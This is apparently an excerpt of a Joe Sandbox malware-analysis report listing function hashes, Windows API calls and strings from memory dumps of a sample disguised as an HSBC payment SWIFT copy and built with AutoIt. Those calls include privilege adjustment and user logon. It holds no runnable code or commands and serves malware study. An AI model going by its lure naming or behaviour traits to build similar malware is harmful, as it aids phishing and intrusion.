                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                • Opcode ID: 9cb3cd2a464be57a6a7e7229e872ece88ffd9090d89db24f73d254d74f5be701
                                                                                                                                • Instruction ID: 558658c2a1e71e8b3d1921a55def9a4137c0a9b73fda490c2c4ddd14c81c20ae
                                                                                                                                • Opcode Fuzzy Hash: 9cb3cd2a464be57a6a7e7229e872ece88ffd9090d89db24f73d254d74f5be701
                                                                                                                                • Instruction Fuzzy Hash: C5118E726006009FDB10EF29D849A2AF7E9FF85320F04C51DF9A9C7290DB34AC01CB91
                                                                                                                                APIs
                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00799468,?,007AFB84,?), ref: 0078A097
                                                                                                                                • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00799468,?,007AFB84,?), ref: 0078A0A9
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3479602957-0
                                                                                                                                • Opcode ID: c9ce98651c67fc5823fcb1c5a697c0894d752ee0202770b56fb910e8c1e384de
                                                                                                                                • Instruction ID: b8294d7fd2299a040ef1f1059f55263646ed82fef4e0b8617c62acdd0700a34b
                                                                                                                                • Opcode Fuzzy Hash: c9ce98651c67fc5823fcb1c5a697c0894d752ee0202770b56fb910e8c1e384de
                                                                                                                                • Instruction Fuzzy Hash: 39F0E23514422DBBDB20AFA4CC48FEA736CBF09362F008166F808D2180D674A900CBA1
                                                                                                                                APIs
                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00778309), ref: 007781E0
                                                                                                                                • CloseHandle.KERNEL32(?,?,00778309), ref: 007781F2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 81990902-0
                                                                                                                                • Opcode ID: e4642bcd5650422a71a271a9ee568eacf056a3e7384849a24d442d4fc6c75b87
                                                                                                                                • Instruction ID: 4a8599f6fb42a78301b4c1a8310392ed91ef57fa0ae656de93664fb92cf51b7f
                                                                                                                                • Opcode Fuzzy Hash: e4642bcd5650422a71a271a9ee568eacf056a3e7384849a24d442d4fc6c75b87
                                                                                                                                • Instruction Fuzzy Hash: 46E08C32010620EFEB252B71EC08D737BEAEF00310710C82DF9A680430CB36ACA0DB50
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00748D57,?,?,?,00000001), ref: 0074A15A
                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0074A163
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: 83ee6bf695d2a4d141ad9ad08b2e7a8fd47a7dc416b5b618753c88bbe5bbc851
                                                                                                                                • Instruction ID: ce746cdf00047cbf11f8ba14f18c71714335436056a6976f1aad7c7dcd13e32f
                                                                                                                                • Opcode Fuzzy Hash: 83ee6bf695d2a4d141ad9ad08b2e7a8fd47a7dc416b5b618753c88bbe5bbc851
                                                                                                                                • Instruction Fuzzy Hash: BDB09231054208ABCF002BD1EC59B883F68EB86AA2F408020F60D84060CBA654508A99
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e60e5ce3fbf530fcbf04d0f38f7994cd80c72306568a40076ad6077a05c84ef5
                                                                                                                                • Instruction ID: 18fe2f8c556a4ef02a09f2ac28b438585bd23e444cfbdd014af1882301656300
                                                                                                                                • Opcode Fuzzy Hash: e60e5ce3fbf530fcbf04d0f38f7994cd80c72306568a40076ad6077a05c84ef5
                                                                                                                                • Instruction Fuzzy Hash: EE320362D29F414DDB279634D872336A289AFB73C4F15D737E819B5EA6EB2CC4834104
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5fecb75795701aeba4b2d621d27f6bef595470dad3f0f453fd2d2a14c7f6e6ee
                                                                                                                                • Instruction ID: 88b687670ee2e6f29ad9c703b94666e2cbffd84f71dd8024d45ef2c03883f8ad
                                                                                                                                • Opcode Fuzzy Hash: 5fecb75795701aeba4b2d621d27f6bef595470dad3f0f453fd2d2a14c7f6e6ee
                                                                                                                                • Instruction Fuzzy Hash: 27B10120E2AF415DD723A6398831336BB9CAFBB2C5F52D71BFC2670D22EB2585834145
                                                                                                                                APIs
                                                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00778389), ref: 007787D1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: LogonUser
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                • Opcode ID: cc09d91c90cedf6dd0ccb50dcb20711daf7a26d86f7f96f682e018f6112c0c8d
                                                                                                                                • Instruction ID: 10429a34d2b81c898435fa8fe0c988d42e4798a185ce70af6166a8e0baa99aff
                                                                                                                                • Opcode Fuzzy Hash: cc09d91c90cedf6dd0ccb50dcb20711daf7a26d86f7f96f682e018f6112c0c8d
                                                                                                                                • Instruction Fuzzy Hash: 06D05E322A050EABEF018EA4DC01EAF3B69EB04B01F40C111FE15C50A1C775D835AB60
                                                                                                                                APIs
                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0074A12A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                • Opcode ID: 3c3843e3f333c6b9f73fcd431c6c9f7278c73bd0eba47fadfe1d7e1c2f8fca62
                                                                                                                                • Instruction ID: 2f31d8c3d7eee0a3ddab3ab245cf43c62dc35f10a735338e1466d5056bec0d23
                                                                                                                                • Opcode Fuzzy Hash: 3c3843e3f333c6b9f73fcd431c6c9f7278c73bd0eba47fadfe1d7e1c2f8fca62
                                                                                                                                • Instruction Fuzzy Hash: 0BA0113000020CAB8F002B82EC08888BFACEA822A0B008020F80C800228B32A8208A88
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 213a49db3b7601736c0b597c79cd6f0537893a7b43b29aca2d51417f0252ad64
                                                                                                                                • Instruction ID: 16e0b3f6c83c8454193998feedd2d62653c6ce76bed0dde7e2c4afc765dc493b
                                                                                                                                • Opcode Fuzzy Hash: 213a49db3b7601736c0b597c79cd6f0537893a7b43b29aca2d51417f0252ad64
                                                                                                                                • Instruction Fuzzy Hash: D122173060474ACBEF688B24C494B7C77B1BB41384F68C46BF55A8B593DBBCAD91C642
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                • Instruction ID: 1a01f32eb7bde2dbf9c357015c88af719b4d9445eca493f0584b0d6ff00dc3b3
                                                                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                • Instruction Fuzzy Hash: A1C1A7722050930ADF2D5639C43413EFBA15EA27B139A076DE8B3CB5D5EF28C976D620
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                • Instruction ID: 59068c087e45201d1d7f5b5ca09c4944d077e8dd371a959fb98790163fabaf7a
                                                                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                • Instruction Fuzzy Hash: BCC1B5722051930ADF2D563AC43403EFAA15EA27F139A076DE4B3DB4D5EF28C976D620
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                • Instruction ID: ae344f97028eb6fa777aa952cbefb6adf4105dbeea1fedd1c97c8957d00f793c
                                                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                • Instruction Fuzzy Hash: 67C1C37234519309DF2D6639C47413EBBA15EA27B139A076DD4B3CB5C4FF28C9A5CA20
                                                                                                                                APIs
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0079785B
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 0079786D
                                                                                                                                • DestroyWindow.USER32 ref: 0079787B
                                                                                                                                • GetDesktopWindow.USER32 ref: 00797895
                                                                                                                                • GetWindowRect.USER32(00000000), ref: 0079789C
                                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007979DD
                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007979ED
                                                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797A35
                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00797A41
                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00797A7B
                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797A9D
                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AB0
                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797ABB
                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00797AC4
                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AD3
                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00797ADC
                                                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797AE3
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00797AEE
                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797B00
                                                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,007B2CAC,00000000), ref: 00797B16
                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00797B26
                                                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00797B4C
                                                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00797B6B
                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797B8D
                                                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00797D7A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                • API String ID: 2211948467-2373415609
                                                                                                                                • Opcode ID: a5e8ceed19fe3cba0e729b2d4182dfbd57ed04321088d3fa120218b538c4fef5
                                                                                                                                • Instruction ID: b212dfe76cb710a8dc01c1b0f437651ed1a8181d1fd7fe652d7a14a9cba409a7
                                                                                                                                • Opcode Fuzzy Hash: a5e8ceed19fe3cba0e729b2d4182dfbd57ed04321088d3fa120218b538c4fef5
                                                                                                                                • Instruction Fuzzy Hash: 03025971A10119EFDF14DFA4EC89EAE7BB9FB49310F148158F915AB2A1C738AD01CB64
                                                                                                                                APIs
                                                                                                                                • CharUpperBuffW.USER32(?,?,007AF910), ref: 007A3627
                                                                                                                                • IsWindowVisible.USER32(?), ref: 007A364B
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_0_2_720000_rHSBCBank_Paymentswiftcpy.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                • API String ID: 4105515805-45149045
                                                                                                                                • Opcode ID: f10c1b5f5c3b8deccaa92c71412e480b50bd0cfcf5ea80aff9e3ae5e50f35283
                                                                                                                                • Instruction ID: 3f2683d20b9925dda363d1692b9c2f2e35708b6b0e5703996003418f1ff9617b
                                                                                                                                • Opcode Fuzzy Hash: f10c1b5f5c3b8deccaa92c71412e480b50bd0cfcf5ea80aff9e3ae5e50f35283
                                                                                                                                • Instruction Fuzzy Hash: 1DD1B730204311DFCB04EF10C459A6E77A1AFD6394F188569F98A5B3A2DB3DEE09CB91
                                                                                                                                APIs
                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 007AA630
                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 007AA661
                                                                                                                                • GetSysColor.USER32(0000000F), ref: 007AA66D
                                                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 007AA687
                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 007AA696
                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 007AA6C1
                                                                                                                                • GetSysColor.USER32(00000010), ref: 007AA6C9
                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 007AA6D0
                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 007AA6DF
                                                                                                                                • DeleteObject.GDI32(00000000), ref: 007AA6E6
                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 007AA731
                                                                                                                                • FillRect.USER32(?,?,00000000), ref: 007AA763
                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 007AA78E
                                                                                                                                  • Part of subcall function 007AA8CA: GetSysColor.USER32(00000012), ref: 007AA903
                                                                                                                                  • Part of subcall function 007AA8CA: SetTextColor.GDI32(?,?), ref: 007AA907
                                                                                                                                  • Part of subcall function 007AA8CA: GetSysColorBrush.USER32(0000000F), ref: 007AA91D
                                                                                                                                  • Part of subcall function 007AA8CA: GetSysColor.USER32(0000000F), ref: 007AA928
                                                                                                                                  • Part of subcall function 007AA8CA: GetSysColor.USER32(00000011), ref: 007AA945
                                                                                                                                  • Part of subcall function 007AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007AA953
                                                                                                                                  • Part of subcall function 007AA8CA: SelectObject.GDI32(?,00000000), ref: 007AA964
                                                                                                                                  • Part of subcall function 007AA8CA: SetBkColor.GDI32(?,00000000), ref: 007AA96D
                                                                                                                                  • Part of subcall function 007AA8CA: SelectObject.GDI32(?,?), ref: 007AA97A
                                                                                                                                  • Part of subcall function 007AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007AA999
                                                                                                                                  • Part of subcall function 007AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007AA9B0
                                                                                                                                  • Part of subcall function 007AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007AA9C5
                                                                                                                                  • Part of subcall function 007AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007AA9ED
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000000.00000002.2119439670.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                • Associated: 00000000.00000002.2119274899.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119476621.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119509439.00000000007DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                • Associated: 00000000.00000002.2119519792.00000000007E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
